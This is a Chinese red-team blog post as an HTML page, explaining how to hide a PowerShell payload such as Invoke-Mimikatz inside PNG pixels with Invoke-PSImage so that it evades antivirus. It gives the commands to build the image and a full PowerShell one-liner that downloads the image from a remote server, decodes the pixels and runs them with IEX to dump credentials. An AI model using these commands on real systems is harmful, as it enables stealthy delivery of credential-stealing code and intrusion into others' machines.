
<!DOCTYPE html>
<html lang="zh-CN" class="loading">
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>红队攻防之图片免杀执行远程命令 - 裁决的博客</title>
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate">
    <meta name="keywords" content="Fechin,"> 
    <meta name="description" content="红队攻防之图片免杀执行远程命令
0x01 前言powershell与图片通过Invoke-PSImage合成执行远程命令
0x02 Invoke-PSImageInvoke-PSImage使用Pow,"> 
    <meta name="author" content="裁决"> 
    <link rel="alternative" href="atom.xml" title="裁决的博客" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">
    <link rel="stylesheet" href="/css/diaspora.css">
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script>
         (adsbygoogle = window.adsbygoogle || []).push({
              google_ad_client: "ca-pub-8691406134231910",
              enable_page_level_ads: true
         });
    </script>
    <script async custom-element="amp-auto-ads" src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js">
    </script>
</head>
</html>
<body class="loading">
    <span id="config-title" style="display:none">裁决的博客</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="icon-home image-icon" href="javascript:;" data-url="http://lilifengcode.github.io"></a>
    <div title="播放/暂停" class="icon-play"></div>
    <h3 class="subtitle">红队攻防之图片免杀执行远程命令</h3>
    <div class="social">
        <!--<div class="like-icon">-->
            <!--<a href="javascript:;" class="likeThis active"><span class="icon-like"></span><span class="count">76</span></a>-->
        <!--</div>-->
        <div>
            <div class="share">
                <a title="获取二维码" class="icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">红队攻防之图片免杀执行远程命令</h1>
        <div class="stuff">
            <span>十月 06, 2019</span>
            

        </div>
        <div class="content markdown">
            <h1 id="红队攻防之图片免杀执行远程命令"><a href="#红队攻防之图片免杀执行远程命令" class="headerlink" title="红队攻防之图片免杀执行远程命令"></a>红队攻防之图片免杀执行远程命令</h1><p><img src="https://s2.ax1x.com/2019/09/29/u8pRqP.jpg" alt></p>
<h2 id="0x01-前言"><a href="#0x01-前言" class="headerlink" title="0x01 前言"></a>0x01 前言</h2><p>powershell与图片通过Invoke-PSImage合成执行远程命令</p>
<h1 id="0x02-Invoke-PSImage"><a href="#0x02-Invoke-PSImage" class="headerlink" title="0x02 Invoke-PSImage"></a>0x02 Invoke-PSImage</h1><p>Invoke-PSImage使用PowerShell脚本并将该脚本的字节编码为PNG图像的像素。它从Web的文件生成一个oneliner来执行。</p>
<p>它可以仅使用有效载荷数据来创建新图像，也可以将有效载荷嵌入现有图像的最低有效字节中，以便看起来像实际的图片。图像保存为PNG，并且可以无损压缩，而不会影响执行有效载荷的能力，因为数据本身以颜色存储。创建新图像时，通常会对常规PowerShell脚本进行显着压缩，通常会生成png，其文件大小约为原始脚本的50％。</p>
<p>使用embed方法时，每个像素中2个颜色值的最低有效4位用于保存有效负载。结果会降低图像质量，但看起来仍然不错。它可以接受大多数图像类型作为输入，但是输出始终是PNG，因为它需要无损。图像的每个像素都用于保存脚本的一个字节，因此您需要一个图像，其像素至少与脚本中的字节一样多。这相当容易-例如，Invoke-Mimikatz适合1920x1200的图像。</p>
<h3 id="参数"><a href="#参数" class="headerlink" title="参数"></a>参数</h3><p><strong>-Script</strong> [filepath]嵌入到图像中的脚本的路径。</p>
<p><strong>-Out</strong> [filepath]将结果图像保存到的文件（图像将为PNG）</p>
<p><strong>-Image</strong> [filepath]要嵌入脚本的图像。（可选）</p>
<p><strong>-WebRequest</strong> 输出用于使用Net.WebClient从Web读取图像的命令。您将需要托管图像并将URL插入命令中。</p>
<p><strong>-PictureBox</strong> 输出用于使用System.Windows.Forms.PictureBox从Web读取图像的命令。您将需要托管图像并将URL插入命令中。</p>
<h3 id="例"><a href="#例" class="headerlink" title="例"></a>例</h3><p>创建一个嵌入了脚本“ Invoke-Mimikatz.ps1”的映像，并输出一个oneliner以从磁盘执行：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PS&gt;Import-Module .\Invoke-PSImage.ps1</span><br><span class="line">PS&gt;Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\evil-kiwi.png -Image .\kiwi.jpg</span><br><span class="line">   [Oneliner to execute from a file]</span><br></pre></td></tr></table></figure>

<p>创建一个嵌入了脚本“ Invoke-Mimikatz.ps1”的图像，然后输出一个oneliner以从Web执行（您仍然必须托管该图像并编辑URL）：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PS&gt;Import-Module .\Invoke-PSImage.ps1</span><br><span class="line">PS&gt;Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\evil-kiwi.png -Image .\kiwi.jpg -WebRequest</span><br><span class="line">   [Oneliner to execute from the web]</span><br></pre></td></tr></table></figure>

<p>执行网络上托管的图像：</p>
<p><img src="https://github.com/peewpw/Invoke-PSImage/raw/master/images/ps_kiwi.png" alt></p>
<h2 id="0x03-操作演示"><a href="#0x03-操作演示" class="headerlink" title="0x03 操作演示"></a>0x03 操作演示</h2><h3 id="准备"><a href="#准备" class="headerlink" title="准备"></a>准备</h3><p>1.图片（2000*2000）左右或者以上 ，注：我曾用过8K之上的图片，合成了三个多小时emmmm</p>
<p>2.Invoke-PSImage</p>
<p>3.Invoke-Mimikatz（powershell脚本，当然你也可以自己写或者利用msf、cs神器等等生成ps脚本）</p>
<p>4.w7虚拟机web环境</p>
<p><img src="https://s2.ax1x.com/2019/09/28/u1IFIK.png" alt></p>
<h3 id="操作过程"><a href="#操作过程" class="headerlink" title="操作过程"></a>操作过程</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Import-Module .\Invoke-PSImage.ps1</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\caijue.png -Out .\caijueshell.png -Web</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.ax1x.com/2019/09/28/u1IOeI.png" alt></p>
<p>将生成的图片放入远程服务器</p>
<p>并在本地执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead(&quot;http://192.168.21.135/caijueshell.png&quot;));$o=a Byte [] 2204160;(0..573)|%&#123;foreach($x in(0..3839))&#123;$p=$g.GetPixel($x,$_);$o[$_*3840+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))&#125;&#125;;IEX([Sys tem.Text.Encoding]::ASCII.GetString($o[0..2204116])):Invoke-Mimikatz</span><br></pre></td></tr></table></figure>

<p>理论上没问题，但是我出错了，，，后来感觉可能是mimikatz的问题，用msfvenom生成一个ps操作，，，发现好像是ps的问题，不搞了2点了，狗命要紧</p>
<p><img src="https://s2.ax1x.com/2019/09/29/u3jzwD.gif" alt></p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        <li title='0' data-url='http://link.hhtjim.com/163/5146554.mp3'></li>
                    
                        <li title='1' data-url='http://link.hhtjim.com/qq/001faIUs4M2zna.mp3'></li>
                    
                </ul>
            
        </div>
        
    <div id='gitalk-container' class="comment link"
        data-ae='false'
        data-ci=''
        data-cs=''
        data-r=''
        data-o=''
        data-a=''
        data-d='false'
    >查看评论</div>


    </div>
    
</div>


    </div>
</div>
</body>
<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>
<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/diaspora.js"></script>
<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">
<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>




</html>
